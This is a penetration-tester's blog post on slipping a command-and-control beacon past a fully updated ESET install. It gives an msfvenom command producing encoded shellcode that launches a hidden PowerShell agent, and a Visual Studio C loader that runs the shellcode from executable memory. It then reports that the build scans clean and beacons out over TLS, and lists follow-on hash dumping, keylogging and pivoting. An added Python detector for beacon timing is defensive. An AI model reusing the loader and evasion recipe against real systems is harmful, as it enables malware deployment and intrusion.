Bypassing Antivirus with malleable C2 software, MSFVenom and Visual Studio

Many times during an engagement you may get a great foothold on a lower-tier machine, or need a way into the environment, only to be stifled by an inability to execute payloads (i.e. antivirus is blocking payload execution). Recently, I have been playing around with some tools, namely two malleable C2 frameworks. Both of these projects work very well. In the following examples I am going to show, unfortunately, just how well they work in a "live fire" demonstration against a fully updated antivirus product installed and running.

To begin, you would need an initial foothold into the site. This can be accomplished via XSS on a site relating to the client, targeted phishing with payloads, or other means. If using XSS, the BeEF XSS Framework is a nifty tool that still works quite well to hook browsers. Once hooked, you can neatly inject your payloads for the malleable C2 server software. I chose to go a bit more targeted, instead testing against a Windows Server 2016 Standard Evaluation with ESET File Security 6.5.12014.1 installed and fully updated:

With the software fully updated, I set out to bypass it.

I first loaded my current test C2 software on Kali and created a PowerShell agent string. The beneficial part of using BeEF or other browser-injection frameworks is that you can inject directly into memory, avoiding artifacts on disk that could be detected or found later. For the sake of this example, I used MSFVenom to create a payload in C that would execute my command:

EX: msfvenom -p windows/exec cmd="powershell -nop -w hidden -e REALLY LONG STRING" -f c -e x86/shikata_ga_nai -i 5 > shell_code_beacon.c

Next, I pasted the resulting shellcode into a skeleton C project for building with Visual Studio. The skeleton code for the project follows:

Skeleton EXE Code:

#include "stdafx.h"
#include <stdio.h>
#include <windows.h> // VirtualAlloc is defined here

unsigned const char payload[] = ""; // msfvenom shellcode goes here
size_t size = 0;                    // payload size reported by msfvenom

int main(int argc, char **argv) {
    char *code; // Holds a memory address
    code = (char *)VirtualAlloc( // Allocate a chunk of memory and store the starting address
        NULL, size, MEM_COMMIT,
        PAGE_EXECUTE_READWRITE   // Set the memory to be writable and executable
    );
    memcpy(code, payload, size); // Copy our payload into the executable section of memory
    ((void(*)())code)();         // Cast the executable memory to a function pointer and run it
    return(0);
}

With the code above, paste the shellcode that MSFVenom produced into the payload array and set size to the byte count it reported. Once that is done, click Build in Visual Studio to build an executable of the command-line beacon application.

With our payload built, it is time to test its efficacy. ESET is a strong product with very high detection rates, especially for heuristic analysis of unknown threats. So, let us see how we did with a right click > context menu scan...

A context menu scan shows that the executable is clean. By comparison, a scan of an encoded Meterpreter would show as Win32/Rozena or Win64/Rozena, depending on how you built the payload. Once the beacon is executed, we see a connection show up in our console.

The traffic uses TLSv1 and appears to go to Amazon, which will slip past some IDS deployments and administrators who are not looking closely at their logs.
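The beaconing traffic described above is what interval analysis over connection logs is built to catch. The following Python check is an added example and not part of the original post: it groups connections by (source, destination, port) and flags pairs whose gaps between connections are nearly constant. The log lines, addresses and thresholds are constructed for the demonstration.

```python
import statistics
from collections import defaultdict

# Constructed Zeek conn.log-style sample (tab separated): ts, id.orig_h, id.resp_h,
# id.resp_p, service. Addresses are documentation ranges, not real hosts. 10.0.0.5
# beacons to 203.0.113.10:443 roughly every 60 s; its other TLS traffic is irregular.
SAMPLE_CONN_LOG = """#fields ts\tid.orig_h\tid.resp_h\tid.resp_p\tservice
1000.0\t10.0.0.5\t203.0.113.10\t443\tssl
1005.0\t10.0.0.5\t198.51.100.20\t443\tssl
1012.0\t10.0.0.5\t198.51.100.20\t443\tssl
1061.0\t10.0.0.5\t203.0.113.10\t443\tssl
1100.0\t10.0.0.7\t198.51.100.30\t443\tssl
1119.0\t10.0.0.5\t203.0.113.10\t443\tssl
1140.0\t10.0.0.5\t198.51.100.20\t443\tssl
1160.0\t10.0.0.7\t198.51.100.30\t443\tssl
1180.0\t10.0.0.5\t203.0.113.10\t443\tssl
1239.0\t10.0.0.5\t203.0.113.10\t443\tssl
1301.0\t10.0.0.5\t203.0.113.10\t443\tssl
1360.0\t10.0.0.5\t203.0.113.10\t443\tssl
1400.0\t10.0.0.5\t198.51.100.20\t443\tssl
1402.0\t10.0.0.5\t198.51.100.20\t443\tssl
1419.0\t10.0.0.5\t203.0.113.10\t443\tssl
1700.0\t10.0.0.5\t198.51.100.20\t443\tssl
"""

def parse_conn_log(text):
    """Yield (ts, src, dst, dst_port) tuples, skipping Zeek '#' header lines."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        ts, src, dst, port, _service = line.split("\t")
        yield float(ts), src, dst, int(port)

def beacon_candidates(rows, min_conns=6, max_cv=0.15):
    """Flag (src, dst, port) pairs whose connection gaps are nearly constant.
    cv = stdev/mean of the gaps; a low cv means a timer is driving the traffic."""
    stamps = defaultdict(list)
    for ts, src, dst, port in rows:
        stamps[(src, dst, port)].append(ts)
    findings = {}
    for pair, times in stamps.items():
        if len(times) < max(2, min_conns):  # too few connections to judge periodicity
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            findings[pair] = {"count": len(times), "interval": mean, "cv": cv}
    return findings

if __name__ == "__main__":
    print(beacon_candidates(parse_conn_log(SAMPLE_CONN_LOG)))
```

Jittered beacons still produce a low cv, while browsing to the same host does not; tune min_conns and max_cv to the sleep and jitter settings you expect to see.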

From this point we can dump password hashes for use in replay attacks if credentials are reused across multiple machines, add other software packages, log keystrokes, and use this machine to pivot across the entire network.

Stay safe out there.

Written by: Dataclast